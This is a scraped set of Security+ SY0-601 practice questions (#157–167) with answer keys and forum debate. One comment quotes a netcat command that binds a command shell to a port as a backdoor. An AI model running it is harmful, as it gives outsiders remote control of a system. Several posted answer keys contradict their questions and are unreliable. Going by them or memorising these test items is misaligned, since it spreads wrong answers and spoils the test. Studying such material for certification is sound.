User password - guestpass
PSK - N/A?
Authentication type - WPA2-Enterprise
upvoted 7 times

  apata123 Most Recent  3 months ago


This came in my exam, please take this Pbqs serious…
upvoted 3 times

  CloudGrogu 4 months, 1 week ago


What are the pulldown options for this question?
upvoted 1 times

  serginljr 4 months ago


WiFi Controller:
Authentication type drop down:
OPEN
WPA-EAP-PEAP-MSCHAPv2
WPA-PSK
WPA2-EAP-PEAP-MSCHAPv2
WPA2-PSK
WEP

Radius Server:
Authentication type drop down:
LOCAL
Active Directory
MSSQL

Wireless Client
Authentication type drop down:
OPEN
WPA-PSK
WEP
WPA2-PSK
WPA2-Enterprise
WPA-Enterprise
upvoted 5 times

  andrizo 3 months, 3 weeks ago


were just picking the strongest auth type then?
upvoted 3 times

  deeden 4 months, 1 week ago


Suggestions were quite confusing due to drop down options not being shown here (i.e. Authentication type). Also, I can't find any reference of
PSK being asked on any of the references I found on the net.
Sample link below.
https://documentation.meraki.com/MR/Encryption_and_Authentication/Configuring_RADIUS_Authentication_with_WPA2-Enterprise

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 278/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  comeragh 5 months ago
Wifi Contoller
AAA Server IP: 192.168.1.20
PSK: Johnknows@123 (if you need to enter something)
Authentication Type: WPA2-PSK

Radius Server
Client IP: 192.168.1.10
Authentication Type: Active Directory

Wireless Client:
SSID: CORPGUEST
Username: guest01
Password: guestpass
PSK: Johnknows@123 (if you need to enter something)
Authentication Type: WPA2-Enterprise
upvoted 5 times

  Phasmid 4 months, 1 week ago


I'm still trying to learn all of this stuff. Could you by any chance give me a clue as to how you knew what IP addresses to fill in?
upvoted 2 times

  _Tyler_ 4 months, 1 week ago


The given info gives most of the answers away for example the AAA server IP you would input the only other IP given in the question so
this would be the IP of your Radius Server and vice versa.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 279/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #157 Topic 1

HOTSPOT -
An incident has occurred in the production environment.

INSTRUCTIONS -
Analyze the command outputs and identify the type of compromise.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 280/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Correct Answer:

  stoneface Highly Voted  5 months ago


Logic Bomb and Backdoor

First compromise relies on a cronjob that will be executed each five minutes
Second compromise is opening port 31337 , https://www.eicar.org/download/eicar.com.txt is a file to test AV products, instead of using real
malware, which could cause real damage, this test file allows people to test anti-virus software without having to use a real computer virus
upvoted 23 times

  rhocale 1 month, 2 weeks ago


this is incorrect the NC gives it away for the second one NC the rat is always listening
upvoted 1 times

  stonefaces_kitten 2 months, 2 weeks ago


Thank you for this! I agree
upvoted 1 times

  andrizo 3 months, 3 weeks ago


https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 281/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

1st thought for the 1st one was sql, but maybe not
upvoted 1 times

  varun0 5 months ago


second compromise is opening a port which can be connected to, when you connect to it, it gives you a bash shell.

I think its a RAT?


upvoted 1 times

  varun0 5 months ago


Disregard this, you are correct
upvoted 3 times

  Lyeen Most Recent  1 month, 3 weeks ago


Logic Bomb and Rat
upvoted 3 times

  pgonza 1 month, 3 weeks ago


1 is Logic Bomb. Whenever some condition must be true for the execution, its a logic bomb.
2 is a backdoor. Netcat can be used to establish backdoor connections to any TCP/UDP port as shown in the command. It is not a RAT because
a trojan has to be a fully function software but with malicious intent. The user has to deliberately install it.
upvoted 1 times

  dr_fog 2 months ago


Logic Bomb and Rat
upvoted 1 times

  ahmedhablas 2 months, 3 weeks ago


I think the second one is RAT.
The term “RAT” (Remote Access Tool) can be considered a synonym to “backdoor”, but it usually signifies a full bundle including a client
application meant for installation on the target system, and a server component that allows administration and control of the individual 'bots' or
compromised systems.
upvoted 1 times

  lift 2 months, 3 weeks ago


the first one answer says rootkit BUT isn't it logic bomb?
upvoted 3 times

  Zaado 3 months, 2 weeks ago


To make it easy for you guys:
if = logic bomb (since logic bomb execute once a condition is met)
nc = rat
upvoted 3 times

  Samxi92 3 months, 2 weeks ago


"Netcat can also establish connections with remote machines. To configure Netcat as a
backdoor, you first set up a listener on the victim system (IP: 10.1.0.1) set to pipe traffic
from a program, such as the command interpreter, to its handler:
nc -l -p 666 -e cmd.exe"

Comptia Guide
upvoted 6 times

  J_Ark1 2 months, 4 weeks ago


such a comand is not present in the example so hence makes it a R.A.T
upvoted 1 times

  Zaado 3 months, 1 week ago


I'm not going to lie, I am debating whether it is either a backdoor or a rat since both are so similar because both give you access to a
remote system.
upvoted 2 times

  NICKJONRIPPER 2 months, 1 week ago


"file.sh" is RAT, "backdoor.sh" is backdoor
upvoted 2 times

  Sandon 1 week, 4 days ago


That is incorrect
upvoted 1 times

  CertAddict69 4 months, 2 weeks ago


Logic Bomb First and RAT Second
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


please explain

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 282/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 283/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #158 Topic 1

After a recent security incident, a security analyst discovered that unnecessary ports were open on a firewall policy for a web server. Which of the
following firewall polices would be MOST secure for a web server?
A.

B.

C.

D.

Correct Answer: D

  stoneface Highly Voted  5 months ago


D)
Any -> Any -> TCP 80 Allow
Any -> Any -> TCP 443 Allow
Any -> Any -> ANY Deny

Although allowing 80 is not secure, it is the best answer of all


upvoted 22 times

  banditring 5 months ago


why? if C is saying Deny for port 80?
upvoted 2 times

  NICKJONRIPPER 2 months, 1 week ago


only deny one 80 insecure port, but allow all other insecure ports, like 23,8080,etc
upvoted 2 times

  Smeevil 4 months, 4 weeks ago


Cause C allows any other traffic in the last line
upvoted 3 times

  jgp 4 months, 4 weeks ago


Because in C you are opening any port by Allowing by default with the ANY -> ANY -> ANY -> Allow
upvoted 2 times

  SecurityArt Most Recent  2 months, 3 weeks ago


It's D
Last line is
Any --> Any --> Any --> Deny
upvoted 1 times

  Iphy23 3 months, 1 week ago


The most correct answer is D
upvoted 2 times

  chael88 4 months ago


This one was not in my exam but one very similar. It asked to allow web server, sftp, DHCP but specifically block FTP. The answer was the one
with port 21 blocked.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 284/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 3 times
  inkedia3 4 months, 1 week ago
Wrote the exams yesterday and passed. Please pay attention to these PBQs. they were all on the exams. Funny I wasnt paying must attention to
them till about three hours before my exams. Anyway I passed with 785 score... I will say give these questions 90% of your attention and look for
the 10% from other sources...
upvoted 3 times

  comeragh 4 months, 3 weeks ago


D - I agree with D being the correct answer here
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 285/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #159 Topic 1

A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each
location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional brownouts that last up
to an hour exists, particularly at one of the locations near an industrial smelter. Which of the following is the BEST solution to reduce the risk of
data loss?

A. Dual supply

B. Generator

C. UPS

D. POU

E. Daily backups

Correct Answer: B

Community vote distribution


C (69%) B (25%) 6%

  apata123 Highly Voted  3 months ago


If ups is not in the option, the answer here is Generator…..I passed my exam and this question appeared but ups wasn’t in the option so I went
with Generator….
upvoted 12 times

  stoneface Highly Voted  5 months ago


Selected Answer: C
UPS is the answer, dont get confused by the smelter thing
upvoted 11 times

  Thanks_stoneface 1 day, 21 hours ago


Thanks stoneface
upvoted 1 times

  varun0 5 months ago


Agreed also generator takes time to get up and going.
upvoted 1 times

  Bogardinc Most Recent  1 week ago


Data center generators are the insurance you need against catastrophic system failure and data loss. Backup power supplies can provide a
reliable power source for hours or days, and it is wise to consider redundant generators for critical systems.

https://2nsystems.com/products/power/data-center-
generator/#:~:text=GENERATORS%20CAN%20SAVE%20YOUR%20DATA%20CENTER&text=After%20utility%20power%20is%20restored,eve
n%20when%20backups%20occur%20frequently.
upvoted 1 times

  PraygeForPass 3 weeks, 1 day ago


I like UPS as an answer as they mention outages can last up to an hour and from my work experience most UPS can last between 1-3 hours, so
hopefully power is up by then.
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: C
The best solution to reduce the risk of data loss in this situation would be to use a UPS (uninterruptible power supply). A UPS is a device that
provides a backup power source to critical systems and equipment in the event of a power outage or disruption. It works by providing a
temporary power supply to the system using batteries, allowing the system to continue running until a permanent power source can be restored.
This would be particularly useful in the case of brief power outages or brownouts, as it would allow the data centers to continue operating
without experiencing any disruption or data loss. Other options, such as dual supply, generator, or point-of-use (POU) systems, may also be
effective in certain situations, but a UPS is generally the most reliable and efficient option for protecting against power disruptions. Daily backups
are important for protecting against data loss, but they alone may not be sufficient to prevent data loss in the event of a prolonged power outage
or disruption.
upvoted 1 times

  Tayfay 4 weeks, 1 day ago


Selected Answer: C
UPS
- Uninterruptible Power Supply
-Short-term backup power
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 286/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

- Blackouts, brownouts, surges


Straight from Professor Messer’s slides
upvoted 1 times
  JustInTime23 1 month, 2 weeks ago
Professor Messer's video on this specifically mentions UPS as the solution for brownouts with a duration of 1 hr or less
upvoted 2 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: B
Can you use a generator during a brownout?

Your best bet for dealing with a brownout or a blackout is to have a reliable generator on-site. That way, you won't have to worry about the length
or impact of your power outage, because you'll be equipped with a steady source of power at the ready. Plus in this scenario here we talking
about “Data Centers” as a whole, not you phone or headphones that needs power. We are talking about powering big hardware all around the
DC…
upvoted 1 times

  mlonz 6 days, 13 hours ago


STF|U dont give wrong answers, you are playing with people lives
upvoted 1 times

  Ranaer 3 weeks, 1 day ago


Yes, however all the infrastructure could go down in the time between the start of the brownout and the generator being up and running to
provide back up electricity. Which is why UPS is the solution. The concern here isnt availability, but rather preventing data loss. UPS will
provide the window in which systems can be safely shut down in order to preserve them. UPS works instantly, and gives you the buffer
required for the infrastructure to safely shut down.
upvoted 1 times

  GetBuckets 2 months ago


From Ian Neil’s book: “UPS is designed
to keep the system going for a few minutes, to allow the server team to close the servers down gracefully.” This will prevent data loss. Since the
question talks about avoiding data loss only, then the best answer is UPS.
upvoted 1 times

  afazaeli 2 months ago


E: daily backup would be the only choice to reduce the risk of data loss.
upvoted 1 times

  Blueteam 2 months, 2 weeks ago


The correct answer is B. Generator
We are not talking about a single monitor or computer here. We are talking about a data center. If you have a rack of a few switches and servers a
monitor, FW etc. you will not get away with UPS for an hour unless you have a couple of HEAVY duty UPS.
In fact both are needed UPS and Generator. However if you need to supply power for an hour to a datacenter then you need Generator.
upvoted 3 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
everything up to 1h can be covered by a UPS. If it needs longer support, you´d have to go with a generator
upvoted 2 times

  zharis 3 months, 1 week ago


Selected Answer: C
A UPS is always required to protect against any interruption to computer services. A back up generator cannot be brought online fast enough to
respond to a power failure
upvoted 2 times

  RawToast 3 months, 1 week ago


UPS means uninterruptable power supply. For those whose brains are melted from all of CompTIA's acronym usage.
upvoted 3 times

  Imanism 3 months, 2 weeks ago


Selected Answer: C
a brownout is an intentional or unintentional drop in voltage in an electrical power supply system.
upvoted 1 times

  deeden 4 months, 1 week ago


Selected Answer: C
I agree with option C. A large bank experiencing daily outages and has no UPS to begin with will have a very bad impression indeed :)
upvoted 1 times

  Jakalan7 4 months, 2 weeks ago


There is an argument for E, since the question asks for the "BEST solution to reduce the risk of data loss" - none of the other technologies
explicitly protect against data loss other than daily backups though.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 287/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

That being said.... UPS seems like the 'obvious' answer.

I'm just not sure if this is a trick question or not.


upvoted 2 times

Question #160 Topic 1

Which of the following would be the BEST way to analyze diskless malware that has infected a VDI?

A. Shut down the VDI and copy off the event logs.

B. Take a memory snapshot of the running system.

C. Use NetFlow to identify command-and-control IPs.

D. Run a full on-demand scan of the root volume.

Correct Answer: C

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: B
Take a snapshot of the VDI would allow to both analyze and temporary isolate the threat as we can then shut it down to proceed to futher analyze
the snapshot
upvoted 19 times

  ronniehaang Most Recent  4 days, 5 hours ago


Selected Answer: B
B. Take a memory snapshot of the running system.

To analyze diskless malware that has infected a Virtual Desktop Infrastructure (VDI), it would be best to take a memory snapshot of the running
system. The malware, as diskless, is likely to exist only in memory, not on disk. A memory snapshot captures the state of the system's memory at
a specific point in time and can be analyzed offline, allowing the security analyst to identify and analyze the malware without risking further
spread. The memory snapshot can be used to analyze the running processes, loaded modules, and other system activity to determine the source
and nature of the malware.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The best way to analyze diskless malware that has infected a VDI would be to take a memory snapshot of the running system. This would
capture the state of the system's memory at the time the snapshot was taken, including any malware that may be present in memory. This would
allow analysts to examine the malware without running the risk of infecting other systems or allowing the malware to continue operating.
Additionally, taking a memory snapshot would allow analysts to examine the malware without shutting down the VDI, which could disrupt other
users and potentially cause data loss. Using NetFlow to identify command-and-control IPs and running a full on-demand scan of the root volume
would not be as effective in analyzing diskless malware, as they would not provide direct access to the malware itself. Copying off the event logs
would also not be as effective, as they may not contain detailed information about the malware.
upvoted 1 times

  lucasvs_ 5 months ago


Selected Answer: B
ake a snapshot of the VDI would allow to both analyze and temporary isolate the threat as we can then shut it down to proceed to futher analyze
the snapshot
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 288/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #161 Topic 1

Users are presented with a banner upon each login to a workstation. The banner mentions that users are not entitled to any reasonable
expectation of privacy and access is for authorized personnel only. In order to proceed past that banner, users must click the OK button. Which of
the following is this an example of?

A. AUP

B. NDA

C. SLA

D. MOU

Correct Answer: B

Community vote distribution


A (82%) B (18%)

  Vishnuks Highly Voted  5 months, 1 week ago


Answer is A (Acceptable use policy)
upvoted 17 times

  Sir_Learnalot Most Recent  2 months, 3 weeks ago


Selected Answer: A
this is a common use for a AUP
upvoted 2 times

  studant_devsecops 2 months, 3 weeks ago


Selected Answer: B
In the AUP there is no agreement. The banner that is displayed informs you that, as soon as you pass the banner, clicking "OK", there is an
agreement
upvoted 2 times

  tibetbey 4 months, 4 weeks ago


Selected Answer: A
An acceptable use policy (AUP) is a document that outlines the rules and restrictions employees must follow in regard to the company's network,
software, internet connection and devices.
upvoted 2 times

  lucasvs_ 5 months ago


Selected Answer: A
Answer is A (Acceptable use policy)
upvoted 2 times

  enginne 5 months ago


Who set answers to these questions ? I think TROLLs : NDA ? haha
upvoted 4 times

  okay123 5 months ago


Selected Answer: A
NDA is non disclosure agreement which is like agreeing to not discuss somehting but Acceptable Use Policy is being made aware of something,
like Terms of Use policy so that nobody can sue your organization cause they can't say you didn't know (legally)
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 289/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #162 Topic 1

The Chief Information Security Officer is concerned about employees using personal email rather than company email to communicate with
clients and sending sensitive business information and PII. Which of the following would be the BEST solution to install on the employees'
workstations to prevent information from leaving the company's network?

A. HIPS

B. DLP

C. HIDS

D. EDR

Correct Answer: D

Community vote distribution


B (71%) D (29%)

  tibetbey Highly Voted  4 months, 4 weeks ago


Selected Answer: B
DLP enables businesses to detect data loss, as well as prevent the illicit transfer of data outside the organization and the unwanted destruction
of sensitive or personally identifiable data (PII).
upvoted 9 times

  Joe1984 5 months ago


Highly Voted 
Shouldn't this be DLP? (Data Loss Prevention)
upvoted 7 times

  enginne 5 months ago


DLP is good answer
upvoted 3 times

  carpathia Most Recent  2 months, 2 weeks ago


Selected Answer: B
EDR includes DLP, but it (EDR) would not be necessary here, a bit of an overkill. DLP is OK.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


I´ll go with DLP on this one. EDR is a software agent that collects system data and logs for analysis by a monitoring system to provide early
detection of threats. It´s not so much on preventing bad things. The Problem is there a dozent of different solutions out there with different
acronyms. I guess a EPP (Enpoint Protection Platform) could be mistaken with EDR here. EPP solutions will act on these things as they often
include DLP, HIDS/HIPS, firewall and AV in one package...but guess this also depends on the definition. Long story short, I think it´s "B" DLP in
this case
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: B
DLP is software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over
unauthorized networks
upvoted 2 times

  CertAddict69 4 months, 2 weeks ago


Selected Answer: B
The answer is B. D would be over thinking it.
upvoted 3 times

  KetReeb 5 months ago


Selected Answer: D
I believe D is correct since EDR includes some DLP for endpoints:
Endpoint detection and response (EDR) solutions are integrated solutions that combine individual endpoint security functions into a complete
package. Having a packaged solution makes updating easier, and frequently these products are designed to integrate into an enterprise-level
solution with a centralized management platform. Some of the common EDR components include antivirus, anti-malware, software patching,
firewall, and DLP solutions. Unified endpoint management (UEM) is a newer security model that focuses on the managing and securing devices
in an enterprise such as desktops, laptops, smartphones, and other devices from a single location.
upvoted 6 times

  J_Ark1 2 months, 4 weeks ago


you are correct in another circumstance but not in this one as The wording of the question is suggesting that the company doesnt want any
sensitive data leaving its archives via unauthorised means hence a rule has to be set in place to prevent exfiltration of data,, hence DLP.
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 290/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  andrizo 3 months, 3 weeks ago
DLP operates on streams, and with NGFW/browsers
https://www.youtube.com/watch?v=eEdD30nYm_k
upvoted 1 times

  deeden 4 months, 1 week ago


I'm a bit confused by how the question is worded. The CISO's concern is clearly the use of personal emails. So, what if employees send
sensitive info via corporate email it's okay? Or maybe, the corporate email security is hardened and has DLP already and that they can't
implement DLP on personal emails e.g. yahoo mail? Then the solution must be to block the use of personal emails in any end point corporate
devices, which could be a reverse-proxy solution, or MDM solution for mobile devices, I think. Not sure if EDR is capable of both?
upvoted 2 times

  RonWonkers 4 months, 2 weeks ago


Information not being allowed to leave the company network == DLP any time
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 291/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #163 Topic 1

On the way into a secure building, an unknown individual strikes up a conversation with an employee. The employee scans the required badge at
the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering
techniques is being utilized?

A. Shoulder surfing

B. Watering-hole attack

C. Tailgating

D. Impersonation

Correct Answer: A

Community vote distribution


C (83%) A (17%)

  Vishnuks Highly Voted  5 months, 1 week ago


Answer C (Tailgating)
upvoted 13 times

  CertAddict69 Highly Voted  4 months, 2 weeks ago


Selected Answer: C
Tailgating is following someone who has access to a secure into that area without having access yourself.

Shoulder surfing is looking at information that someone who has access to it is looking at over their shoulder /while they have it open to view
when you shouldn't otherwise have access to that information. This sounds more like Tailgating than Shoulder surfing for sure.
upvoted 5 times

  FMMIR Most Recent  1 month, 3 weeks ago


Selected Answer: C
The social engineering technique being utilized in this scenario is tailgating. Tailgating, also known as piggybacking, is a tactic in which an
attacker follows an authorized individual into a secure area without being properly authorized. In this scenario, the unknown individual is using the
employee's act of scanning their badge at the door and holding the door open as an opportunity to gain unauthorized access to the secure
building. This tactic exploits the natural tendency of people to be helpful and courteous, and can be difficult to prevent without strict security
measures in place.
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: C
Striking a conversation on the way to a secure building gives the idea of him following the employee. Tailgating is absolutely the answer
upvoted 1 times

  Callie_Cassanova 3 months, 2 weeks ago


Selected Answer: A
The question does not mention that the person holding the door follows them in. I think it is shoulder surfing because the question mentions that
the employee scans the required badge to enter the building which makes me think that the person holding the door is shoulder surfing to see
which badge is being used for entry. If it was tailgating shouldn't the question mention that they followed them in?
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


true however key words are "conversation" and "holding the door open out of kindness" hence tailgating as they are building trust and
eventually will follow them in, but I agree that sometimes even the best exams have typos i them :)
upvoted 1 times

  ergo54 3 months, 4 weeks ago


Selected Answer: C
Folks, this is NOT shoulder surfing. If this question is even on the test, please pick Tailgating with confidence. Shouldn't have to explain this.
upvoted 4 times

  pdbone 4 months ago


Shoulder surfing? that is not possible
upvoted 1 times

  andrizo 3 months, 3 weeks ago


what would they even be looking at? no device to monitor
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 292/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  DandyAndy 4 months, 1 week ago


Selected Answer: C
It is Tailgaiting at my old job(not IT) we called it shadowing when a patient would try to follow you out of a lockdown/inpatient facility.
upvoted 2 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: C
Clear case of tailgating
upvoted 2 times

  comeragh 5 months ago


Selected Answer: C
This is tailgating people
upvoted 2 times

  varun0 5 months ago


Selected Answer: C
Tailgating
upvoted 2 times

  Josh_Feng 5 months ago


Selected Answer: A
Shoulder surfing is when you acquire information by looking over someone shoulder... it should be tailgating.
upvoted 2 times

  Josh_Feng 5 months ago


Answer is C. can't edit my vote.
upvoted 3 times

  Joe1984 5 months ago


That would be tailgating Answer is C
upvoted 5 times

  Wildstar 5 months ago


Why is this not tailgating?
upvoted 5 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 293/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #164 Topic 1

Two hospitals merged into a single organization. The privacy officer requested a review of all records to ensure encryption was used during record
storage, in compliance with regulations. During the review, the officer discovered that medical diagnosis codes and patient names were left
unsecured. Which of the following types of data does this combination BEST represent?

A. Personal health information

B. Personally identifiable information

C. Tokenized data

D. Proprietary data

Correct Answer: B

Community vote distribution


A (92%) 8%

  stoneface Highly Voted  5 months ago


Selected Answer: A
This is PHI -> Personal Health Information
upvoted 14 times

  AidenB4704 Most Recent  1 month, 2 weeks ago


Selected Answer: A
PHI - "BEST" Represents
upvoted 2 times

  VendorPTS 4 months ago


Selected Answer: A
Seems like it has to be A (Personal Health Information - PHI), though I almost selected PII under the assumption that it was a trick question since
PHI is supposed to be Protected Health Information, not Personal Health Information, but that's probably overthinking it. I agree with A as the
best choice.
upvoted 2 times

  omodara 4 months, 1 week ago


Agree with A. Protected health information PHI is a subset of PII, but it specifically refers to health information shared with HIPAA covered
entities. Medical records, lab reports, and hospital bills are PHI, along with any information relating to an individual’s past, present, or future
physical or mental health.
upvoted 3 times

  comeragh 5 months ago


Selected Answer: A
Agree with A - PHI
upvoted 1 times

  lucasvs_ 5 months ago


Selected Answer: A
This is PHI -> Personal Health Information
upvoted 1 times

  k9_462 5 months ago


Selected Answer: B
B - when you tie PHI (diagnoses codes) to a name, it becomes PII.
upvoted 2 times

  k9_462 5 months ago


upon reconsidering, i may go with A - PHI
upvoted 1 times

  Dachosenone 5 months ago


Selected Answer: A
"medical diagnosis codes and patient names were left unsecured" which makes it > Personal Health Information
upvoted 2 times

  Joe1984 5 months ago


Selected Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 294/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

I think PHI, this is pretty specific the medical records.


upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 295/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #165 Topic 1

A company discovered that terabytes of data have been exfiltrated over the past year after an employee clicked on an email link. The threat
continued to evolve and remain undetected until a security analyst noticed an abnormal amount of external connections when the employee was
not working. Which of the following is the MOST likely threat actor?

A. Shadow IT

B. Script kiddies

C. APT

D. Insider threat

Correct Answer: D

Community vote distribution


C (80%) D (20%)

  KetReeb Highly Voted  5 months ago


Answer is C: First, it is not an insider threat, since it occurred after an attack on the user, and then continues without the user's interaction.
From All-in-one: An APT attack is characterized by using toolkits to achieve a presence on a target network and then, instead of just moving to
steal information, focusing on the long game by maintaining a persistent presence on the target network. The tactics, tools, and procedures of
APTs are focused on maintaining administrative access to the target network and avoiding detection. Then, over the long haul, the attacker can
remove intellectual property and more from the organization, typically undetected.
upvoted 17 times

  stoneface Highly Voted  5 months ago


Selected Answer: C
Concur with KetReeb, this is cleary an APT
upvoted 12 times

  Gino_Slim 3 months, 1 week ago


In stoneface trust...that they trust KetReeb
upvoted 2 times

  Zoluson Most Recent  4 days, 11 hours ago


Selected Answer: D
APT isn't a threat actor.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
Based on the information provided, the most likely threat actor in this scenario is an insider threat. This means that the threat was likely carried
out by an employee or contractor of the company, who had access to the company's data and networks. Insider threats can be difficult to detect
and prevent, as the person carrying out the threat has legitimate access to the company's systems and data. In this case, it seems that the
employee may have been tricked into clicking on a malicious link in an email, which allowed the threat actor to gain access to the company's
systems and exfiltrate data over a period of time.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


The most likely threat actor in this situation is an insider threat. This is because the employee's actions (clicking on an email link) enabled the
threat to continue undetected for an extended period of time. An Advanced Persistent Threat (APT) is also a possibility, but it is less likely
because APTs are typically carried out by highly-skilled and well-funded attackers, whereas in this case, the employee's actions were the
cause of the data exfiltration. Shadow IT and script kiddies are less likely threat actors in this situation because they are typically associated
with unauthorized or unskilled use of technology, and there is no indication that this was the case in this situation.
upvoted 1 times

  RobbieAmy 2 months ago


Also concur with KetReeb....the only logical answer here is APT
upvoted 1 times

  studant_devsecops 3 months, 2 weeks ago


Selected Answer: D
The question does not refer to the threat itself, but the probable actor.
Right answer is D
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


That is incorrect. You over thought it. The attack occurred ON the employee. Never stated that they employee themselves did it.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 296/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 2 times
  ExamTopicsDiscussor 4 months ago
Script kiddies? LOL!
upvoted 3 times

  Halaa 4 months, 2 weeks ago


Selected Answer: C
An advanced persistent threat (APT) is a covert cyber attack on a computer network where the attacker gains and maintains unauthorized access
to the targeted network and remains undetected for a significant period.
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


thats what made me think A but yeah i agree with C
upvoted 1 times

  ksave 4 months, 2 weeks ago


Selected Answer: C
Undetected for long period of time --> APT
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 297/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #166 Topic 1

An untrusted SSL certificate was discovered during the most recent vulnerability scan. A security analyst determines the certificate is signed
properly and is a valid wildcard. This same certificate is installed on the other company servers without issue. Which of the following is the MOST
likely reason for this finding?

A. The required intermediate certificate is not loaded as part of the certificate chain.

B. The certificate is on the CRL and is no longer valid.

C. The corporate CA has expired on every server, causing the certificate to fail verification.

D. The scanner is incorrectly configured to not trust this certificate when detected on the server.

Correct Answer: B

Community vote distribution


A (100%)

  db97 Highly Voted  4 months, 1 week ago


Answer is A.

I will share with you part of my experience while performing vuln scans: most of the time the scanning engine will require a root CA certificate (if
needed) to get more accurate results in regards to the scan. If a root CA certificate is not provided and a SSL certificate is located on a server, the
result will be that is "untrusted" so we have to load the root one and the warning will disappear :)
upvoted 13 times

  yorkwu Highly Voted  5 months ago


Selected Answer: A
"This same certificate is installed on the other company servers without issue" -> I think the certificate is still valid, so the answer is A
upvoted 9 times

  banditring 5 months ago


thats exactly what I'm thinking. Answer B makes no sense.
upvoted 2 times

  zharis Most Recent  3 months, 1 week ago


Selected Answer: A
Should be A, period
upvoted 2 times

  kennyleung0514 3 months, 3 weeks ago


Selected Answer: A
Because the certificate is valid on other servers.
So it seems to be chain issue
upvoted 2 times

  abrilo 3 months, 3 weeks ago


If someone tries to use a device that doesn’t have that trust in place, a message will appear that say that the certificate is not trusted. That’s why
it’s very common to distribute your CA certificates to all of your devices and that will ensure that your root CA, intermediate CA, and all of the
other CA which you’re using are trusted internally.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
I think A cause the others dont work
upvoted 1 times

  enginne 4 months, 4 weeks ago


Selected Answer: A
Self-signed certificate
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 298/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #167 Topic 1

A company wants to improve end users' experiences when they log in to a trusted partner website. The company does not want the users to be
issued separate credentials for the partner website. Which of the following should be implemented to allow users to authenticate using their own
credentials to log in to the trusted partner's website?

A. Directory service

B. AAA server

C. Federation

D. Multifactor authentication

Correct Answer: B

Community vote distribution


C (100%)

  Vishnuks Highly Voted  5 months, 1 week ago


Answer C (Federation)
upvoted 13 times

  zharis Most Recent  3 months, 1 week ago


Selected Answer: C
Federation means the company trusts accounts created and managed by a different network. It connects the identity management services of
multiple systems
